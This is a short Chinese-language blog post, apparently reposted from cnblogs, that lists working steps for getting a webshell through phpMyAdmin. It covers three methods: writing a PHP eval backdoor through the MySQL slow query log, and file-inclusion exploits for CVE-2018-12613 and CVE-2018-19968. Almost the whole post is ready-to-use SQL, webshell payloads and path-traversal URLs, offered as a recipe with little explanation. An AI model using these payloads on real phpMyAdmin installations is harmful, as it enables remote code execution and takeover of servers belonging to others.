标签：WebShell phpMyAdmin plop .. phpmyadmin 写入 session test php

1. 慢日志查询getshell
show variables like '%slow%'
set global slow_query_log=on;
set global slow_query_log_file='E:/phpstudy_pro/WWW/slow.php'
select '<?php @eval($_POST[shell]);?>' or sleep(10);

2.CVE-2018-12613 phpMyAdmin文件包含getshell
利用数据库表文件
phpmyadmin图形化界面创建表ctf字段名为<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>
select @@datadir
表的路径就是查询出来data路径+数据库名/表名.frm
http://localhost/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../phpstudy_pro/Extensions/MySQL5.7.26/data/test/ctf.frm

利用session文件
利用包含phpinfo()先找到session文件的位置
执行Sql语句产生session
SELECT "<?php fputs(fopen('a.php','w'),'<?php eval($_POST[a]);?>');?> "; 
session文件名就是 sess_你的session
http://localhost/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../phpstudy_pro/Extensions/tmp/tmp/sess_tfrvjj7ngc23vfk0e72mfsg416hffh60

3.CVE-2018-19968 phpmyadmin文件包含getshell
创建表格，字段中插入webshell
create table test.play (flag varchar(100));
insert into test.play SELECT "<?php fputs(fopen('a.php','w'),'<?php eval($_POST[a]);?>');?> "; 
访问路径生成phpmyadmin配置表
http://localhost:8889/phpMyAdmin4.8.1/chk_rel.php?fixall_pmadb=1&db=test
篡改配置表pma__column_info的数据
INSERT INTO pma__column_info SELECT '1', 'test', 'play', 'flag', 'plop', 'plop', 'plop', 'plop', '/../../../../../../phpstudy_pro/Extensions/tmp/tmp/sess_tfrvjj7ngc23vfk0e72mfsg416hffh60
','plop';
访问URL文件包含
tbl_replace.php?db=test&table=play&where_clause=1=1&fields_name[multi_edit][][]=flag&clause_is_unique=1

标签：WebShell,phpMyAdmin,plop,..,phpmyadmin,写入,session,test,php
来源： https://www.cnblogs.com/ersuani/p/13892903.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。